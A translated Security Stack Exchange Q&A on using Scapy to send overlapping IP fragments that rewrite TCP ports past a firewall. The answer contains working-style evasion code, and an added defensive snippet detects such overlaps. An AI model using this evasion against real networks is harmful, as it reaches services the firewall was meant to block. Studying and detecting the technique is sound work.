Overlapping fragment attack with Scapy

Security user
Asked on 2014-02-22 22:33:52
Answers 1 · Views 6.8K · Followers 0 · Votes 3

How can I use Scapy to overwrite part of the TCP header information in the first fragment, which contains data that is allowed through the firewall, with malicious data in subsequent fragments?

For example: rewrite the destination port number to change the service type, i.e. from port 80 (HTTP) to port 23 (Telnet), which would normally not be allowed through the router.

I want to overwrite the destination port so that the connection goes to the new port number. I am trying to bypass the firewall restriction on a remote web server that only allows web traffic on port 80.

I used this sample code, but got no response from the target machine:

```python
from scapy.all import IP, TCP, ICMP, send

dstIP = '10.0.2.17'

# first fragment: offset 0, MF set, carries the TCP header with dport=80 plus an ICMP echo
frag1 = IP(dst=dstIP, id=12345, proto=1, frag=0, flags=1)/TCP(dport=80)/ICMP(type=8, code=0, chksum=0xdce8)

# later fragments with the same IP id, each carrying a TCP header with dport=23
frag2 = IP(dst=dstIP, id=12345, proto=1, frag=2, flags=1)/TCP(dport=23)/"ABABABAB"

frag3 = IP(dst=dstIP, id=12345, proto=1, frag=1, flags=0)/TCP(dport=23)/"AAAAAAAABABABABACCCCCCCC"

send(frag1)
send(frag2)
send(frag3)
```

1 Answer

Security user

Posted on 2015-10-06 23:18:08

Create a fake IP header to hint proto=tcp. Note that you cannot modify IP header fields with fragment overlap, since we are talking about IP payload fragmentation. Set the MF (more fragments) flag and indicate that this is the first fragment by setting the offset to 0 (frag=0). Create another IP packet with the same IP.id, IP.src, IP.dst and IP.proto, without the MF flag set (the last fragment does not have the MF bit set). This packet will overlap the IP payload at a specific offset, so set the fragment offset frag=x, where the actual position in the payload is x*8, i.e. offset=1 is byte position 8 (this would be the TCP checksum).

Here is a simple example:

```python
import struct
from scapy.all import IP, TCP, Raw, fragment, send

dstIP = '10.0.2.17'

# create two IP packets, one with 1480 payload bytes and one with 4 payload bytes
# initial payload is TCP with sport/dport being 9999

frags = fragment(IP(dst=dstIP)/TCP(sport=9999,dport=9999)/("FAKE"*(1464//4)))

# [<IP  flags=MF frag=0 proto=tcp dst=10.0.2.17 |<Raw  load="'\x0f'\x0f\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xd5n\x00\x00FAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKE" |>>, <IP  flags= frag=185 proto=tcp dst=10.0.2.17 |<Raw  load='FAKE' |>>]
# overwrite the 4 payload bytes of fragment 2 to overlap the reassembled IP packet at offset 0 to overwrite sport/dport to port 80,80

frags[1][Raw].load=struct.pack("!HH",80,80)  # network byteorder
frags[1][IP].frag=0
# <IP  flags= frag=0 proto=tcp dst=10.0.2.17 |<Raw  load='\x00P\x00P' |>>

# send your fragments and watch them being reassembled in wireshark/...
# they should show up the initial IP/TCP/sport=dport=9999 packet but with sport/dport being set to 80
send(frags)
```

This reassembles to:

```python
IP(dst=dstIP)/TCP(sport=80,dport=80)/("FAKE"*(1460//4))
```

Note that you still have to fix the TCP checksum, and that modern firewalls usually use IP defragmentation and TCP stream reassembly to evaluate the actually reassembled packet/segment rather than one of its fragments.

Votes 1
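A defender-side complement to the answer above, added here and not part of the original post: a small pure-Python check that flags overlapping fragments of one datagram and, in particular, overlaps that land inside the transport header, which is exactly what the answer's two fragments produce. Scapy is not needed; the fragment sets are constructed inline with the offsets and lengths the answer describes (the IP ids are arbitrary).

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

@dataclass(frozen=True)
class Frag:
    """One IP fragment as seen on the wire (constructed record, no Scapy needed)."""
    ip_id: int    # IP identification field, shared by all fragments of one datagram
    offset: int   # fragment offset in 8-byte units, exactly as carried in the IP header
    length: int   # number of payload bytes carried by this fragment
    mf: bool      # More Fragments flag

def byte_range(f: Frag) -> Tuple[int, int]:
    """Half-open byte range [start, end) this fragment covers in the reassembled payload."""
    start = f.offset * 8
    return start, start + f.length

def find_overlaps(frags: List[Frag]) -> List[Tuple[Frag, Frag]]:
    """Return pairs of fragments of the same datagram whose byte ranges overlap.
    A compliant sender never produces overlapping fragments, so every hit is worth logging."""
    by_id: Dict[int, List[Frag]] = {}
    for f in frags:
        by_id.setdefault(f.ip_id, []).append(f)
    hits: List[Tuple[Frag, Frag]] = []
    for group in by_id.values():
        group.sort(key=lambda f: f.offset)
        for i, a in enumerate(group):
            a_start, a_end = byte_range(a)
            for b in group[i + 1:]:
                b_start, b_end = byte_range(b)
                if b_start < a_end and a_start < b_end:
                    hits.append((a, b))
    return hits

def header_rewrites(frags: List[Frag], header_len: int = 20) -> List[Tuple[int, int, int]]:
    """Overlaps that touch the first header_len payload bytes, i.e. the transport header
    (TCP ports sit at bytes 0-3, the checksum at 16-17). Returns (ip_id, start, end) of the
    overlapped header bytes so a rule can flag 'later fragment rewrote the TCP header'."""
    out: List[Tuple[int, int, int]] = []
    for a, b in find_overlaps(frags):
        start = max(byte_range(a)[0], byte_range(b)[0])
        end = min(byte_range(a)[1], byte_range(b)[1], header_len)
        if start < end:
            out.append((a.ip_id, start, end))
    return out

# Constructed sample: the two fragments the answer sends after editing frags[1]
ANSWER_FRAGS = [Frag(0x1234, 0, 1480, True), Frag(0x1234, 0, 4, False)]
# Constructed sample: what fragment() produced before the edit, a clean split at byte 1480
BENIGN_FRAGS = [Frag(0x1235, 0, 1480, True), Frag(0x1235, 185, 4, False)]
```

Which fragment's bytes win on overlap is a per-OS reassembly policy, so a reassembling firewall or IDS should reject or alert on the overlap itself rather than trust any one ordering.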
Original content from Security Stack Exchange; translation provided by Tencent Cloud's IT-domain engine.
Original link: https://security.stackexchange.com/questions/52070